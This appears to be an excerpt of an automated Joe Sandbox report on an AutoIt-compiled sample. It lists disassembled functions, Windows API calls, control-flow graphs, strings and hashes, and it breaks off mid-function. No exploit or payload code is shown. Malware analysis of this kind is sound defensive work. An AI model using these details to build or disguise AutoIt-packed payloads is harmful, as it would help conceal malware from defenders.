                                                      • Instruction ID: 7aaca1d6ea0e65078898542011ed76224f2392f0d72b6c6a1e19ec81a4ecc141
                                                      • Opcode Fuzzy Hash: dd8e27389eff7514fc7523ddd3e8a2baf53d62349d109cdff653703828923832
                                                      • Instruction Fuzzy Hash: 4751E432A04289EECF21EBB4ED55EFD7BB8AF44304F0040A5F865A71A1DE705A47CB21
                                                      Function 00A64AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 996 a64afe-a64b5e call a677c7 GetVersionExW call a67d2c 1001 a64b64 996->1001 1002 a64c69-a64c6b 996->1002 1004 a64b67-a64b6c 1001->1004 1003 a9db90-a9db9c 1002->1003 1005 a9db9d-a9dba1 1003->1005 1006 a64b72 1004->1006 1007 a64c70-a64c71 1004->1007 1009 a9dba3 1005->1009 1010 a9dba4-a9dbb0 1005->1010 1008 a64b73-a64baa call a67e8c call a67886 1006->1008 1007->1008 1018 a9dc8d-a9dc90 1008->1018 1019 a64bb0-a64bb1 1008->1019 1009->1010 1010->1005 1012 a9dbb2-a9dbb7 1010->1012 1012->1004 1014 a9dbbd-a9dbc4 1012->1014 1014->1003 1016 a9dbc6 1014->1016 1020 a9dbcb-a9dbce 1016->1020 1021 a9dca9-a9dcad 1018->1021 1022 a9dc92 1018->1022 1019->1020 1023 a64bb7-a64bc2 1019->1023 1024 a64bf1-a64c08 GetCurrentProcess IsWow64Process 1020->1024 1025 a9dbd4-a9dbf2 1020->1025 1030 a9dc98-a9dca1 1021->1030 1031 a9dcaf-a9dcb8 1021->1031 1026 a9dc95 1022->1026 1027 a9dc13-a9dc19 1023->1027 1028 a64bc8-a64bca 1023->1028 1032 a64c0d-a64c1e 1024->1032 1033 a64c0a 1024->1033 1025->1024 1029 a9dbf8-a9dbfe 1025->1029 1026->1030 1038 a9dc1b-a9dc1e 1027->1038 1039 a9dc23-a9dc29 1027->1039 1034 a64bd0-a64bd3 1028->1034 1035 a9dc2e-a9dc3a 1028->1035 1036 a9dc08-a9dc0e 1029->1036 1037 a9dc00-a9dc03 1029->1037 1030->1021 1031->1026 1040 a9dcba-a9dcbd 1031->1040 1041 a64c20-a64c30 call a64c95 1032->1041 1042 a64c89-a64c93 GetSystemInfo 1032->1042 1033->1032 1043 a9dc5a-a9dc5d 1034->1043 1044 a64bd9-a64be8 1034->1044 1046 a9dc3c-a9dc3f 1035->1046 1047 a9dc44-a9dc4a 1035->1047 1036->1024 1037->1024 1038->1024 1039->1024 1040->1030 1055 a64c32-a64c3f call a64c95 1041->1055 1056 a64c7d-a64c87 GetSystemInfo 1041->1056 1045 a64c56-a64c66 1042->1045 1043->1024 1049 a9dc63-a9dc78 1043->1049 1050 a9dc4f-a9dc55 1044->1050 1051 a64bee 1044->1051 1046->1024 1047->1024 1053 a9dc7a-a9dc7d 1049->1053 1054 a9dc82-a9dc88 1049->1054 1050->1024 1051->1024 1053->1024 1054->1024 1061 a64c76-a64c7b 1055->1061 1062 a64c41-a64c45 GetNativeSystemInfo 1055->1062 1058 a64c47-a64c4b 1056->1058 1058->1045 1060 a64c4d-a64c50 FreeLibrary 1058->1060 1060->1045 1061->1062 1062->1058
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00A64B2B
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      • GetCurrentProcess.KERNEL32(?,00AEFAEC,00000000,00000000,?), ref: 00A64BF8
                                                      • IsWow64Process.KERNEL32(00000000), ref: 00A64BFF
                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00A64C45
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A64C50
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00A64C81
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00A64C8D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: faf8efa214427ede146e3b46072e15d47f61d968ba12834b30a3b42aa751d1c5
                                                      • Instruction ID: b9acebd254e8959b01e505f71cb38e64f356933062ad5d671745c68789046551
                                                      • Opcode Fuzzy Hash: faf8efa214427ede146e3b46072e15d47f61d968ba12834b30a3b42aa751d1c5
                                                      • Instruction Fuzzy Hash: 7991C47154ABC4DECB31DB7885511AAFFF4AF2A300B484E9ED0CB97B41D220E948D769
                                                      Function 00A64FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1063 a64fe9-a65001 CreateStreamOnHGlobal 1064 a65003-a6501a FindResourceExW 1063->1064 1065 a65021-a65026 1063->1065 1066 a9dd5c-a9dd6b LoadResource 1064->1066 1067 a65020 1064->1067 1066->1067 1068 a9dd71-a9dd7f SizeofResource 1066->1068 1067->1065 1068->1067 1069 a9dd85-a9dd90 LockResource 1068->1069 1069->1067 1070 a9dd96-a9dd9e 1069->1070 1071 a9dda2-a9ddb4 1070->1071 1071->1067
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A64EEE,?,?,00000000,00000000), ref: 00A64FF9
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A64EEE,?,?,00000000,00000000), ref: 00A65010
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00A64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A64F8F), ref: 00A9DD60
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00A64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A64F8F), ref: 00A9DD75
                                                      • LockResource.KERNEL32(00A64EEE,?,?,00A64EEE,?,?,00000000,00000000,?,?,?,?,?,?,00A64F8F,00000000), ref: 00A9DD88
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 43f89f416ba0ade9ad0a149ced36185c61ae7e9e4363b98feb5c371e9b6b8fd5
                                                      • Instruction ID: 3d9929926fc3aefba9baa8290f0f013779ccb72ec5aa724a10389b355b9bb808
                                                      • Opcode Fuzzy Hash: 43f89f416ba0ade9ad0a149ced36185c61ae7e9e4363b98feb5c371e9b6b8fd5
                                                      • Instruction Fuzzy Hash: 5F117C75600741BFD7218B65DC98F677BB9EBC9B51F20856CF506CA260DB71EC018660
                                                      Function 00AC4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00A9E7C1), ref: 00AC46A6
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00AC46B7
                                                      • FindClose.KERNEL32(00000000), ref: 00AC46C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: f9e198bc3e232cee26e20e3e77ad3f6a55ad3775646c7877e342c7d02844bed5
                                                      • Instruction ID: 567e01cbd3990ece9421be4c9a5676a4eea62f19acf859c2cbee61adaf8a6ba6
                                                      • Opcode Fuzzy Hash: f9e198bc3e232cee26e20e3e77ad3f6a55ad3775646c7877e342c7d02844bed5
                                                      • Instruction Fuzzy Hash: C6E0D8318149005F4210A778EC9D8EA775CDE0A335F100719F935C50E0E7B05D508699
                                                      Function 00A6E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00AA428C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: b41a069ca46b5403eac120d3d2a024e26f8f3ea444b2b490927701bb90e1d075
                                                      • Instruction ID: 267af49e6e778c01fce3ba8cfd561bb0514476cae54963a81da785cafcb6c9c1
                                                      • Opcode Fuzzy Hash: b41a069ca46b5403eac120d3d2a024e26f8f3ea444b2b490927701bb90e1d075
                                                      • Instruction Fuzzy Hash: CDA2BF79A04205CFCF24CF98C980AAEB7B1FF59304F248169E916AB391D775ED42CB91
                                                      Function 00A70B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A70BBB
                                                      • timeGetTime.WINMM ref: 00A70E76
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A70FB3
                                                      • TranslateMessage.USER32(?), ref: 00A70FC7
                                                      • DispatchMessageW.USER32(?), ref: 00A70FD5
                                                      • Sleep.KERNEL32(0000000A), ref: 00A70FDF
                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00A7105A
                                                      • DestroyWindow.USER32 ref: 00A71066
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A71080
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00AA52AD
                                                      • TranslateMessage.USER32(?), ref: 00AA608A
                                                      • DispatchMessageW.USER32(?), ref: 00AA6098
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AA60AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 4003667617-3242690629
                                                      • Opcode ID: 333cbde219132dd29693a7fbdf4baeb0e0861ac1890deefb56f4c669e12c8b6a
                                                      • Instruction ID: 56eccb4293b4899fce3bb3c603c83d4716c5ef6a5813b3e4f3200a72befc2c43
                                                      • Opcode Fuzzy Hash: 333cbde219132dd29693a7fbdf4baeb0e0861ac1890deefb56f4c669e12c8b6a
                                                      • Instruction Fuzzy Hash: 16B2BD70A08741DFD724DF24C984FAAB7F5BF85304F14891DE48A872A1DB75E885CB86
                                                      Function 00AC93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00AC91E9: __time64.LIBCMT ref: 00AC91F3
                                                        • Part of subcall function 00A65045: _fseek.LIBCMT ref: 00A6505D
                                                      • __wsplitpath.LIBCMT ref: 00AC94BE
                                                        • Part of subcall function 00A8432E: __wsplitpath_helper.LIBCMT ref: 00A8436E
                                                      • _wcscpy.LIBCMT ref: 00AC94D1
                                                      • _wcscat.LIBCMT ref: 00AC94E4
                                                      • __wsplitpath.LIBCMT ref: 00AC9509
                                                      • _wcscat.LIBCMT ref: 00AC951F
                                                      • _wcscat.LIBCMT ref: 00AC9532
                                                        • Part of subcall function 00AC922F: _memmove.LIBCMT ref: 00AC9268
                                                        • Part of subcall function 00AC922F: _memmove.LIBCMT ref: 00AC9277
                                                      • _wcscmp.LIBCMT ref: 00AC9479
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AAE
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AC1
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AC96DC
                                                      • _wcsncpy.LIBCMT ref: 00AC974F
                                                      • DeleteFileW.KERNEL32(?,?), ref: 00AC9785
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AC979B
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AC97AC
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AC97BE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: c053fceba2098865fd9b5a41aca01c2400dc44ce7549abd69114030084ff6b68
                                                      • Instruction ID: 6a1d0ec09afe69f532900932594765b799403939a457e162312bf9ea1b90117f
                                                      • Opcode Fuzzy Hash: c053fceba2098865fd9b5a41aca01c2400dc44ce7549abd69114030084ff6b68
                                                      • Instruction Fuzzy Hash: CEC108B1D00229AEDF21DFA5CD85EDFB7BDAF45310F0040AAF609E6151EB709A848F65
                                                      Function 00A63015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A63074
                                                      • RegisterClassExW.USER32(00000030), ref: 00A6309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A630AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00A630CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A630DC
                                                      • LoadIconW.USER32(000000A9), ref: 00A630F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A63101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: da79af444e8d69700ebdc352d076c3815b51cda4ceaf4eabd6a25d8b290af0d7
                                                      • Instruction ID: 8c3bdcb9efe56b6e0d1fcb626279449121b1fb7e42477cd622126a08582b22e2
                                                      • Opcode Fuzzy Hash: da79af444e8d69700ebdc352d076c3815b51cda4ceaf4eabd6a25d8b290af0d7
                                                      • Instruction Fuzzy Hash: 4C31E7B1940389EFDB50DFA4D889A89BBF4FB09310F14452AE590EA290E7B54586CF51
                                                      Function 00A63041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A63074
                                                      • RegisterClassExW.USER32(00000030), ref: 00A6309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A630AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00A630CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A630DC
                                                      • LoadIconW.USER32(000000A9), ref: 00A630F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A63101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 1c308885ece03902e5455718bb5ca3a3af00906788533ef4f486c29856f8d32c
                                                      • Instruction ID: 69e1fc68d6ebbc5349f4887e14c9cf08c2992a9770a8f7c5a16ba3efb04aed4b
                                                      • Opcode Fuzzy Hash: 1c308885ece03902e5455718bb5ca3a3af00906788533ef4f486c29856f8d32c
                                                      • Instruction Fuzzy Hash: 8021C5B1D11258EFDB10DFE4E889B9DBBF4FB08700F00812AF910AB2A0DBB545458F91
                                                      Function 00A671EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00A64864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B262F8,?,00A637C0,?), ref: 00A64882
                                                        • Part of subcall function 00A8074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A672C5), ref: 00A80771
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A67308
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A9ECF1
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A9ED32
                                                      • RegCloseKey.ADVAPI32(?), ref: 00A9ED70
                                                      • _wcscat.LIBCMT ref: 00A9EDC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 56e65f9146bfb9a370625621f31c52b84ba1e81e5ddaa9fae432f13bfe86dde0
                                                      • Instruction ID: b06216eb676adee6b3af8fde80600a5e4632302a89b446e98ee08caf04557ea5
                                                      • Opcode Fuzzy Hash: 56e65f9146bfb9a370625621f31c52b84ba1e81e5ddaa9fae432f13bfe86dde0
                                                      • Instruction Fuzzy Hash: 26716771548301DEC724EF65ED859ABBBF8FF99340B40092EF445871A1EF30994ACBA6
                                                      Function 00A63A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A63A62
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00A63A71
                                                      • LoadIconW.USER32(00000063), ref: 00A63A88
                                                      • LoadIconW.USER32(000000A4), ref: 00A63A9A
                                                      • LoadIconW.USER32(000000A2), ref: 00A63AAC
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A63AD2
                                                      • RegisterClassExW.USER32(?), ref: 00A63B28
                                                        • Part of subcall function 00A63041: GetSysColorBrush.USER32(0000000F), ref: 00A63074
                                                        • Part of subcall function 00A63041: RegisterClassExW.USER32(00000030), ref: 00A6309E
                                                        • Part of subcall function 00A63041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A630AF
                                                        • Part of subcall function 00A63041: InitCommonControlsEx.COMCTL32(?), ref: 00A630CC
                                                        • Part of subcall function 00A63041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A630DC
                                                        • Part of subcall function 00A63041: LoadIconW.USER32(000000A9), ref: 00A630F2
                                                        • Part of subcall function 00A63041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A63101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 6602bcf19e1ab5c7e4c3543cc9aacfedac8a0b7f8d09452c907dc424c89b57c2
                                                      • Instruction ID: 8c5cb0a92b33b1de955ec003e22128d91731e2546f7e3ccf2a42ff08e031cf6a
                                                      • Opcode Fuzzy Hash: 6602bcf19e1ab5c7e4c3543cc9aacfedac8a0b7f8d09452c907dc424c89b57c2
                                                      • Instruction Fuzzy Hash: E9215C71D00344EFEB21DFA4EC49B9D7BB4FB08710F00422AF504AB2A0DBBA56568F84
                                                      Function 00A63633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 767 a63633-a63681 769 a63683-a63686 767->769 770 a636e1-a636e3 767->770 772 a636e7 769->772 773 a63688-a6368f 769->773 770->769 771 a636e5 770->771 774 a636ca-a636d2 DefWindowProcW 771->774 775 a9d31c-a9d34a call a711d0 call a711f3 772->775 776 a636ed-a636f0 772->776 777 a63695-a6369a 773->777 778 a6375d-a63765 PostQuitMessage 773->778 779 a636d8-a636de 774->779 810 a9d34f-a9d356 775->810 781 a63715-a6373c SetTimer RegisterWindowMessageW 776->781 782 a636f2-a636f3 776->782 783 a9d38f-a9d3a3 call ac2a16 777->783 784 a636a0-a636a2 777->784 780 a63711-a63713 778->780 780->779 781->780 788 a6373e-a63749 CreatePopupMenu 781->788 786 a9d2bf-a9d2c2 782->786 787 a636f9-a6370c KillTimer call a644cb call a63114 782->787 783->780 801 a9d3a9 783->801 789 a63767-a63776 call a64531 784->789 790 a636a8-a636ad 784->790 795 a9d2f8-a9d317 MoveWindow 786->795 796 a9d2c4-a9d2c6 786->796 787->780 788->780 789->780 798 a636b3-a636b8 790->798 799 a9d374-a9d37b 790->799 795->780 804 a9d2c8-a9d2cb 796->804 805 a9d2e7-a9d2f3 SetFocus 796->805 808 a636be-a636c4 798->808 809 a6374b-a6375b call a645df 798->809 799->774 807 a9d381-a9d38a call ab817e 799->807 801->774 804->808 811 a9d2d1-a9d2e2 call a711d0 804->811 805->780 807->774 808->774 808->810 809->780 810->774 816 a9d35c-a9d36f call a644cb call a643db 810->816 811->780 816->774
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00A636D2
                                                      • KillTimer.USER32(?,00000001), ref: 00A636FC
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A6371F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A6372A
